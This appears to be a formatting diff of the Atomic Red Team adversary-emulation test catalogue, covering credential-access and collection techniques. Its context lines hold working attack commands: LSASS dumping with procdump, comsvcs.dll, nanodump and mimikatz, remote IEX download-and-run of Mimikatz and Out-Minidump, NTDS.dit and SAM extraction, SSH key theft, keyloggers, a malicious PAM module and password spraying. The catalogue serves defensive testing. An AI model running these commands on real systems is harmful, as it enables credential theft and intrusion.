-3044,7 +3044,7 @@ credential-access: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -3063,14 +3063,14 @@ credential-access: dependencies: - description: 'Checking if pam_tty_audit.so is installed -' + ' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: 
@@ -3101,14 +3101,14 @@ credential-access: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. -' + ' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -3118,7 +3118,7 @@ credential-access: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND -' + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -3135,14 +3135,14 @@ credential-access: dependencies: - description: 'This test requires to be run in a bash shell -' + ' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' input_arguments: output_file: name: output_file @@ -3158,7 +3158,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm #{output_file} -' + ' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. 
@@ -3166,20 +3166,20 @@ credential-access: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' input_arguments: user_account: description: Basic ssh user account for testing. @@ -3193,7 +3193,7 @@ credential-access: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ -' + ' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -3205,14 +3205,14 @@ credential-access: dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -3221,7 +3221,7 @@ credential-access: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd -' + ' T1557.001: technique: external_references: @@ -3541,10 +3541,10 @@ credential-access: - description: 'Windows Credential Editor must exist on disk at specified location (#{wce_exe}) -' + ' prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -3584,10 +3584,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" @@ -3598,7 +3598,7 @@ credential-access: command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using comsvcs.dll @@ -3613,10 +3613,10 @@ credential-access: command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full -' + ' cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Dump LSASS.exe Memory using direct system calls and API unhooking @@ -3639,10 +3639,10 @@ credential-access: - description: 'Dumpert executable must exist on disk at specified location (#{dumpert_exe}) -' + ' prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null @@ -3651,7 +3651,7 @@ credential-access: command: "#{dumpert_exe}\n" cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using NanoDump 
@@ -3669,21 +3669,21 @@ credential-access: - description: 'NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe) -' + ' prereq_command: 'if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe" executor: command: '%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp" -' + ' cleanup_command: 'del "%temp%\nanodump.dmp" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Windows Task Manager @@ -3726,10 +3726,10 @@ credential-access: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -3739,19 +3739,19 @@ credential-access: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force - description: 'Lsass dump must exist at specified location (#{input_file}) -' + ' prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)" -' + ' get_prereq_command: 'Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" -' + ' executor: command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit -' + ' name: command_prompt elevation_required: true - name: LSASS read with pypykatz 
@@ -3768,35 +3768,35 @@ credential-access: dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live lsa -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 @@ -3813,7 +3813,7 @@ credential-access: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump @@ -3841,10 +3841,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -3854,7 +3854,7 @@ credential-access: command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Powershell Mimikatz 
@@ -3876,7 +3876,7 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); Invoke-Mimikatz -DumpCreds -' + ' name: powershell elevation_required: true - name: Dump LSASS with .Net 5 createdump.exe @@ -3898,15 +3898,15 @@ credential-access: dependencies: - description: 'Computer must have createdump.exe from .Net 5 -' + ' prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" -' + ' executor: command: | echo "Createdump Path #{createdump_exe}" @@ -3916,7 +3916,7 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs @@ -3941,10 +3941,10 @@ credential-access: dependencies: - description: 'Computer must have xordump.exe -' + ' prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} @@ -3952,7 +3952,7 @@ credential-access: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1557: 
@@ -4158,19 +4158,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'vssadmin.exe create shadow /for=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy @@ -4197,34 +4197,34 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' - description: 'Volume shadow copy must exist -' + ' prereq_command: 'if not exist #{vsc_name} (exit /b 1) -' + ' get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create Volume Shadow Copy with vssadmin''" to fulfill this requirement -' + ' - description: 'Extract path must exist -' + ' prereq_command: 'if not exist #{extract_path} (exit /b 1) -' + ' get_prereq_command: 'mkdir #{extract_path} -' + ' executor: command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit 
@@ -4256,22 +4256,22 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: | mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with WMI @@ -4290,19 +4290,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'wmic shadowcopy call create Volume=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy remotely with WMI @@ -4325,18 +4325,18 @@ credential-access: - description: 'Target must be a reachable Domain Controller, and current context must be domain admin -' + ' prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief -' + ' get_prereq_command: 'echo Sorry, can''t connect to target host, check: network, firewall or permissions (must be admin on target) -' + ' executor: command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with Powershell 
@@ -4500,11 +4500,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4530,11 +4530,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4577,14 +4577,14 @@ credential-access: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". -' + ' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. -' + ' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -4592,7 +4592,7 @@ credential-access: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -' + ' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture 
@@ -4759,10 +4759,10 @@ credential-access: dependencies: - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe}) -' + ' prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" @@ -4827,7 +4827,7 @@ credential-access: C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1110.002: @@ -4995,7 +4995,7 @@ credential-access: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -5008,14 +5008,14 @@ credential-access: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -5107,7 +5107,7 @@ credential-access: description: 'Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller -' + ' supported_platforms: - windows input_arguments: @@ -5130,7 +5130,7 @@ credential-access: description: 'Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos -' + ' supported_platforms: - windows input_arguments: 
@@ -5180,7 +5180,7 @@ credential-access: auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 description: 'Attempt to brute force Azure AD user via AzureAD powershell module. -' + ' supported_platforms: - azure-ad input_arguments: @@ -5197,14 +5197,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: name: powershell elevation_required: false @@ -5236,7 +5236,7 @@ credential-access: dependencies: - description: 'Check if running on a Debian based machine. -' + ' prereq_command: | if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi @@ -5244,7 +5244,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'apt-get update && apt-get install -y openssl sudo -' + ' executor: elevation_required: true command: | @@ -5267,7 +5267,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target -' + ' name: sh - name: SUDO brute force Redhat auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade @@ -5279,7 +5279,7 @@ credential-access: dependencies: - description: 'Check if running on a Redhat based machine. -' + ' prereq_command: | if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi @@ -5287,7 +5287,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'yum -y update && yum install -y openssl sudo -' + ' executor: elevation_required: true command: | 
@@ -5310,7 +5310,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target -' + ' name: sh T1555.005: technique: @@ -5476,13 +5476,13 @@ credential-access: dependencies: - description: 'List of domain users to password spray must exits at %temp%\users.txt -' + ' prereq_command: 'if not exist %temp%\users.txt (exit /b 1) -' + ' get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat -' + ' executor: name: command_prompt elevation_required: false @@ -5490,7 +5490,7 @@ credential-access: /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL -' + ' - name: Password Spray (DomainPasswordSpray) auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | @@ -5589,14 +5589,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: name: powershell elevation_required: false @@ -5716,10 +5716,10 @@ credential-access: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -5753,35 +5753,35 @@ credential-access: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1552.004: technique: id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf @@ -5856,14 +5856,14 @@ credential-access: executor: command: 'dir c:\ /b /s .key | findstr /e .key -' + ' name: command_prompt elevation_required: true - name: Discover Private SSH Keys auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 description: 'Discover private SSH keys on a macOS or Linux system. -' + ' supported_platforms: - macos - linux @@ -5879,17 +5879,17 @@ credential-access: executor: command: 'find #{search_path} -name id_rsa >> #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 description: 'Copy private SSH keys on a Linux system to a staging folder using the `cp` command. -' + ' supported_platforms: - linux input_arguments: 
@@ -5907,14 +5907,14 @@ credential-access: find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; cleanup_command: 'rm #{output_folder} -' + ' name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a description: 'Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. -' + ' supported_platforms: - macos - linux @@ -5933,14 +5933,14 @@ credential-access: find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} -' + ' name: sh - name: Copy the users GnuPG directory with rsync auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command. -' + ' supported_platforms: - macos - linux @@ -5959,7 +5959,7 @@ credential-access: find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} -' + ' name: sh - name: ADFS token signing and encryption certificates theft - Local auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f @@ -5972,13 +5972,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. -' + ' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: | Import-Module AADInternals -Force 
@@ -6018,14 +6018,14 @@ credential-access: dependencies: - description: 'AADInternals and ActiveDirectory modules must be installed. -' + ' prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc @@ -6120,7 +6120,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist -' + ' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6141,7 +6141,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" -' + ' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | @@ -6169,7 +6169,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist -' + ' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6178,11 +6178,11 @@ credential-access: echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - description: 'Requires Python -' + ' prereq_command: "(which python || which python3 || which python2)\n" get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" -' + ' executor: name: sh elevation_required: true @@ -6194,7 +6194,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" -' + ' T1606.002: technique: external_references: 
@@ -6289,13 +6289,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. -' + ' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: | Import-Module AADInternals -Force @@ -6383,42 +6383,42 @@ credential-access: auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: 'Parses registry hives to obtain stored credentials -' + ' supported_platforms: - windows dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live registry -' + ' name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -6444,12 +6444,12 @@ credential-access: executor: command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} -' + ' name: command_prompt elevation_required: true cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 -' + ' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. @@ -6501,7 +6501,7 @@ credential-access: auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 description: 'Dump hives from volume shadow copies with System.IO.File -' + ' supported_platforms: - windows input_arguments: 
@@ -7315,7 +7315,7 @@ collection: elevation_required: false command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} -' + ' cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' T1560.003: technique: @@ -7411,7 +7411,7 @@ collection: auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 description: 'Uses GZip from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7427,10 +7427,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7438,15 +7438,15 @@ collection: command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'', ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using bz2 in Python (Linux) auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d description: 'Uses bz2 from Python to compress files -' + ' supported_platforms: - linux input_arguments: 
@@ -7462,25 +7462,25 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash elevation_required: false command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using zipfile in Python (Linux) auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 description: 'Uses zipfile from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7496,10 +7496,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7507,15 +7507,15 @@ collection: command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'', mode=''w'').write(''#{path_to_input_file}'')" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using tarfile in Python (Linux) auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db description: 'Uses tarfile from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7531,10 +7531,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7543,7 +7543,7 @@ collection: mode='w').write('#{path_to_input_file}')\" \n" cleanup_command: 'rm #{path_to_output_file} -' + ' T1560.001: technique: created: '2020-02-20T21:01:25.428Z' 
@@ -7626,10 +7626,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7639,10 +7639,10 @@ collection: elevation_required: false command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} -' + ' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 -' + ' - name: Compress Data and lock with password for Exfiltration with winrar auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c description: | @@ -7662,10 +7662,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob 